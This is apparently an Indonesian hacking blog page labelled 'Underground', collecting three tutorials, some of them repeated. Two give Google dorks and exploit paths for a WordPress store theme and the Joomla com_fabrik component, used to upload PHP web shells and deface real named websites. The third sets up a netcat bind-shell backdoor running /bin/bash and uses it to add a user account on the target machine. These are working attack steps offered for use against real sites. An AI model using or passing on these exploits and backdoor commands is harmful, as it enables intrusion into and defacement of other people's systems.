Showing posts with label Underground. Show all posts
Hack Web With WPStore
Hack Web With WPStore
oke ane newbie mau share tutor cupu
buat para mastah mastah disini lewatin aja
oke kita langsung saja
dork :
inurl:ptype=store
inurl:ptype=cart
dork bisa dikembangin sendiri sesuai anda
tidak semua web bisa sukses dengan exploit ini
epxloitnya :
example :
jika tampilan webnya berubah menjadi gini berarti kemungkinan besar web vuln
terus tinggal upload deh shell ente
kalau belum punya shell nih gw ada shell punya IDCA
Download
jika setelah diupload muncul kaya gini kemungkinan besar shell sudah dapat di akses
lalau yg terakhir cari tempat shell yg sudah di upload tadi
biasanya di sini
oke sekian tutor cupu dari saya untuk kurang lebihnya mohon maaf
dan kalau REPOST ya hapus aja bang admin yg ganteng
salam saya UZUMADY
buat para mastah mastah disini lewatin aja
oke kita langsung saja
dork :
inurl:ptype=store
inurl:ptype=cart
dork bisa dikembangin sendiri sesuai anda
tidak semua web bisa sukses dengan exploit ini
epxloitnya :
Quote:/wp-content/themes/framework/upload
example :
Quote:http://yourweddingdress.co.za/wp-content...rk/upload/
jika tampilan webnya berubah menjadi gini berarti kemungkinan besar web vuln
terus tinggal upload deh shell ente
kalau belum punya shell nih gw ada shell punya IDCA
Download
Quote:username : root
password : toor
jika setelah diupload muncul kaya gini kemungkinan besar shell sudah dapat di akses
lalau yg terakhir cari tempat shell yg sudah di upload tadi
biasanya di sini
Quote:/wp-content/uploads/products_img/[nama shell anda].php
oke sekian tutor cupu dari saya untuk kurang lebihnya mohon maaf
dan kalau REPOST ya hapus aja bang admin yg ganteng
salam saya UZUMADY
deface dengan com_fabrik .
Untuk para master, dedengkot, mbahnya hacker khususnya defacer, pasti sudah tidak asing lagi Exploit com_fabrik. Namun untuk newbie seperti ane pasti masih clingak-clinguk. Maka dari itu ane mau berbagi sesuatu bagi yang belom tau :)
Oke, untuk yang belum tahu disimak ya :)
Dork :
inurl:"index.php?option=com_fabrik"site:.uk (silahkan dikembangkan)
Exploit :
index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=1echercher
Langkah2nya :
Buka mbah google.com
Masukkan Dorknya tadi inurl:"inurl:"index.php?option=com_fabrik"site:.uk"
Pilih target. Misal kita mendapat http://www.case-stores.de/index.php?opti...mp;lang=de
Setelah menemukan target, ganti (explotasi) URLnya hingga menjadi http://www.case-stores.de/index.php?opti...1echercher
maka hasil nya seperti ini ,kalo tidak seperti ini mending cari yang lain :)
Upload shell ente Dan untuk melihat shell yang telah di upload, buka http://www.target.com/media/shell.php
seperti ini ,sekarang kita udah masuk ke web tersebut tinggal ganti index nya :)
dan taraaaaaaaa berhasil :)
Mudah banget kan??? :)
Oke, selamat berburu....[/b]
Oke, untuk yang belum tahu disimak ya :)
Dork :
inurl:"index.php?option=com_fabrik"site:.uk (silahkan dikembangkan)
Exploit :
index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=1echercher
Langkah2nya :
Buka mbah google.com
Masukkan Dorknya tadi inurl:"inurl:"index.php?option=com_fabrik"site:.uk"
Pilih target. Misal kita mendapat http://www.case-stores.de/index.php?opti...mp;lang=de
Setelah menemukan target, ganti (explotasi) URLnya hingga menjadi http://www.case-stores.de/index.php?opti...1echercher
maka hasil nya seperti ini ,kalo tidak seperti ini mending cari yang lain :)
Upload shell ente Dan untuk melihat shell yang telah di upload, buka http://www.target.com/media/shell.php
seperti ini ,sekarang kita udah masuk ke web tersebut tinggal ganti index nya :)
dan taraaaaaaaa berhasil :)
Mudah banget kan??? :)
Oke, selamat berburu....[/b]
Membuat Backdor di linux
1) siapkan 2 buah laptop sebagai percobaannya
2)Pada kedua komputer tersebut lakukan instalasi paket netcat
Code:
apt-get install netcat
3) Pada komputer target (server) buat backdoor dengan netcat
Code:
nc –l –p 5050 –e /bin/bash
catatan :-l : listen, siap menerima koneksi-p : pada port berapa koneksi diterima-e : jalankan perintah terminal yaitu /bin/bashSetelah itu cek dengan perintah nmap untuk melihat bahwa port 5050 dalam keadaan terbuka di sisi server.
Code:
# nmap localhost
4)Pada komputer penyerang, lakukan akses terhadap port diatas, kemudian buat account pada komputer server
Code:
# nc 192.168.50.10 5050debianGUI:~# nc 10.252.42.132 5050adduser datahack => buat user datahack disisi serverAdding user `datahack' ...Adding new group `datahack' (1002) ...Adding new user `datahack' (1002) with group `datahack' ...Creating home directory `/home/datahack' ...Copying files from `/etc/skel' ...datahack => buat password : datahackdatahack => retype passwordChanging the user information for datahackEnter the new value, or press ENTER for the defaultFull Name []:Room Number []:Work Phone []:Home Phone []:Other []:yIs the information correct? [Y/n] y^C
5) Dari account yang sudah dibuat diatas, lakukan koneksi dengan telnet ke sisi server, sehingga anda sudah berhasil masuk ke sisi server.
Code:
# telnet 192.168.50.10
Subscribe to:
Posts (Atom)